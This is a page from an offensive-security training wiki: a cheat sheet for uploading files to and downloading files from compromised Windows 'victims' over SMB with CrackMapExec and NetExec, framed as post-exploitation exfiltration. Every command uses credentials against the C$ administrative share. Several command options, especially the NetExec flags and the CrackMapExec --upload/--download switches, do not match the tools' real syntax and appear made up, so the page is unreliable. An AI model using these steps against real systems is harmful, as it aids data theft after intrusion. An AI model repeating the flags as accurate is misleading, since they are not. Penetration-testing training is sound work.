Zero Day Archives
  • What is Zero Day Archives?
  • Contributors
  • Wireless Security
    • Intro to WiFi Pentesting
      • WEP Networks
      • WPS
      • WPA-PSK Networks
      • WPA & WPA2 PSK
      • WPA2 & WPA3 Enterprise Networks
      • WPA2 & WPA3-APLess
  • Reverse Engineering
    • Reverse Engineering
      • Introduction to Software Reverse Engineering
        • Introduction to Capture the Flag (CTF) Competitions
        • What are PE & Elf Binaries
        • Assembly Language for Beginner Reverse Engineers
        • Memory Registers for x86-64 (64-bit) and x86 (32-bit)
        • Reversing Tools: Command-Line Utilities for Binary Analysis
        • Reversing ELF Binaries: Techniques and Tools
      • Disassembly & Debugging
        • GDB for Reverse Engineering
        • RADARE2 for Reverse Engineering
        • GHIDRA for Reverse Engineering
        • IDA Pro for Reverse Engineering
      • Binary Exploitation
        • Buffer Overflows
          • What are Buffer Overflows and Stack Protections?
          • Commonly Exploited C Functions and Their Secure Alternatives
          • Basic Buffer Overflow in x86-64 Using GDB
        • Cryptography
          • Understanding Ciphers and Identifying Common Patterns
          • Teaching XOR Operations in Binary Exploitation
        • Return Oriented Programming (ROP)
          • Practical Guide to Exploring and Identifying Return-Oriented Programming (ROP)
        • Cracking and Patching Binaries
          • Tactics, Tools, and Procedures for Cracking and Patching Binaries
        • Ret2Win Challenges
  • Malware Analysis
    • Malware Analysis
      • Static Analysis
  • Transporting Files to/from Victims
    • Transferring Files to/from High Value Targets
      • Linux
      • Windows
      • CrackMapExec (NetExec)
  • Penetration Testing against GIT Remote Repositories
    • Targeting GIT Repositories
      • Attacking GIT
  • Network Pivoting, Port Forwarding, and Tunneling
    • Pivoting
      • Ligolo-ng
        • Basic Pivoting
        • Setup Reverse Shells through Pivot
        • Transferring Files through Pivot
      • Pivoting: Using Remote Desktop
      • ProxyChains
      • Metasploit
    • SSH Tunneling
      • SSH Local Port Forwarding
      • SSH Dynamic Port Forwarding
      • Sshuttle over SSH
    • Port Fowarding
      • Chisel Port Forwarding
      • NetSH for Port Forwarding
      • Plink for Port Forwarding
      • SoCat
      • Metasploit: Port Forwarding
  • Anti-Virus Evasion
    • Anti-Virus Evasion
      • Evasion with Metasploit
      • Evasion wtih Shellter
      • Evasion with Virus Total
  • Public Exploit Research
    • Online Exploit Research & Methods
  • Password Attacks
    • Password Attacks
      • Identifying Hashes
        • Hash Identifier Tools
      • John The Ripper
        • Cracking Passwords with John
        • Convert to Hashes with John
        • NTLM vs NTLMv2 Hashes + CrackMapExec
      • Hashcat
        • Cracking Passwords with Hashcat
      • Hydra
        • Hydra for Network Services
        • Hydra for Web Services
      • Mutating Wordlists for John & Hashcat
        • Mutating Wordlists
  • Digital Forensics & Incident Response (DFIR)
    • Digital Forensics
  • Data Science
    • Data Science/AI
  • Software Defined Radio (SDR)
    • Software Defined Radio
  • Embedded Systems Programming
    • Field Programmable Gate Arrays (FPGAs)
  • Other Resources
    • Resources for Hackers
Powered by GitBook
On this page
  1. Transporting Files to/from Victims
  2. Transferring Files to/from High Value Targets

CrackMapExec (NetExec)

Below is a cheat sheet for transporting files using CrackMapExec (CME) and Netexec during post-exploitation. These tools are widely used in penetration testing, especially when working with SMB and remote systems in Windows environments.

Uploading Files to Victims Using CrackMapExec and Netexec

1. CrackMapExec (CME) - Uploading Files

CrackMapExec is a popular tool for interacting with SMB shares and automating tasks like file transfers, enumeration, and exploitation. It can be used to upload files to remote systems that are accessible via SMB.

Attacking Machine Command (Upload File using CrackMapExec):

crackmapexec smb 10.10.10.10 -u username -p password --upload /path/to/local/file.txt C$\\path\\to\\remote\\file.txt

Explanation:

  • crackmapexec smb tells CME to use SMB protocol.

  • 10.10.10.10 is the IP address of the victim machine.

  • -u username -p password specifies the credentials.

  • --upload /path/to/local/file.txt C$\\path\\to\\remote\\file.txt uploads a local file to the remote machine using the C$ share (administrative share). The destination path is specified after C$.

2. Netexec - Uploading Files

Netexec is another tool that facilitates command execution and file transfers. It allows users to upload files to remote systems over SMB.

Attacking Machine Command (Upload File using Netexec):

netexec -t 10.10.10.10 -u username -p password -f /path/to/local/file.txt -r C$\\path\\to\\remote\\file.txt

Explanation:

  • netexec.exe is the command-line tool used for execution.

  • -t 10.10.10.10 specifies the target victim machine’s IP address.

  • -u username -p password provides the necessary credentials for authentication.

  • -f /path/to/local/file.txt specifies the local file to be uploaded.

  • -r C$\\path\\to\\remote\\file.txt specifies the destination path on the remote machine.

Downloading Files from Victims Using CrackMapExec and Netexec

1. CrackMapExec (CME) - Downloading Files

CrackMapExec can also be used to download files from remote systems over SMB. This can be useful for exfiltrating data after successful exploitation.

Attacking Machine Command (Download File using CrackMapExec):

crackmapexec smb 10.10.10.10 -u username -p password --download C$\\path\\to\\remote\\file.txt /path/to/local/file.txt

Explanation:

  • --download C$\\path\\to\\remote\\file.txt /path/to/local/file.txt specifies that the file located at the given remote path will be downloaded to the specified local path.

2. Netexec - Downloading Files

Netexec can also be used to download files from the victim system. This is useful for extracting valuable files during a post-exploitation phase.

Attacking Machine Command (Download File using Netexec):

netexec.exe -t 10.10.10.10 -u username -p password -d C$\\path\\to\\remote\\file.txt -l /path/to/local/file.txt

Explanation:

  • -d C$\\path\\to\\remote\\file.txt specifies the remote file to be downloaded.

  • -l /path/to/local/file.txt defines where the downloaded file will be saved on the attacking machine.

PreviousWindowsNextTargeting GIT Repositories

Last updated 2 months ago